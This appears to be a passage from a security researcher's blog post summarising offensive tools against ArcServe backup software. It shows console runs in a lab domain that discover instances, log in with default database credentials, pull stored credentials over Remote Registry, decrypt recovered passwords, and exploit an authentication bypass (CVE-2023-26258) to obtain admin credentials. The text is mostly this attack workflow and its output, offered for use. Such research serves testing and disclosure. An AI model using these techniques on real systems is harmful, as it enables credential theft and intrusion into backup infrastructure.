The TL; DR;

If you are in the network you can scan for instances configured by default using I tried to port it to C# but couldn't, feel free to do it if you know how :)

c:\Users\vagrant\Desktop>python "Ethernet 2" 6969
                -=[ ArcServe Finder - @TheXC3LL  - MDSec ]=-

[*] Starting to monitor
[*] Broadcasting
WARNING: Mac address to reach destination not found. Using broadcast.
        [+] => ServerName;KINGSLANDING;InstanceName;ARCSERVE_APP;IsClustered;No;Version;15.0.2000.5;tcp;62197;;

If it is configured by default you can use default DB creds to connect to the IP and port obtained before and read the username/password plus where the ArcServe instances are located using

psyconauta@insulanova:/tmp|⇒  python3 -target -port 62197
		-=[ ArcServe credential retriever (from DB) - Juan Manuel Fernandez (@TheXC3LL)  - MDSec]=-

[*] Connecting to the server
[*] Login with default creds
[*] Extracting credentials:
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[*] Finding hosts:
	[+] | kingslanding.sevenkingdoms.local | Windows Server 2019 Datacenter Evaluation
	[+] | kingslanding.sevenkingdoms.local | NULL

 Have a nice day! ^_^

All the passwords retrieved by the tools can be decrypted using ArcServeDecrypter.exe. Just edit the C code to add the array, compile and execute it:

                -={ ArcServe Decryptor by Juan Manuel Fernandez (@TheXC3LL) - MDSec}=-

[+] Decrypted string: vagrant

If you have a user with local admin privileges on the server where ArcServe is installed you can read the credentials using Remote Registry service (

psyconauta@insulanova:/tmp|⇒  python3 -u eddard.stark -p 'FightP3aceAndHonor!' -d sevenkingdoms.local -target-ip
		-=[ ArcServe Credential Stealer - (@TheXC3LL) - MDSec]=-
[+] Connecting to
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to
[+] Opening registry key
	[*] User: P3TWLADS11STD\vagrant
	[*] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[+] Stopping Remote Registry Service

Have a nice day! ^_^

Finally, if the ArcServe version was not patched (CVE-2023-26258) you can exploit an authentication bypass in the management web interface and retrieve the admin creds (

psyconauta@insulanova:/tmp|⇒  python3
		-=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-

[*] Triggering info leak
	[+] AdminName: SEVENKINGDOMS\vagrant
	[+] AuthUUID: 6bf37b8e-ac4f-487d-8d74-d6d0a8d9b8d1
[*] Getting a valid session
	[+] Session: AGENTJSESSIONID=CA35EF18A4FF2F85E25538F60C3F7428
[*] Doing an authenticated request to validate if session is valid
[*] Session is valid
	[+] Admin: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98} // Paste it to the decrypter

Have a happy hacking! ^_^

So here ends the summary of tools that you can find here.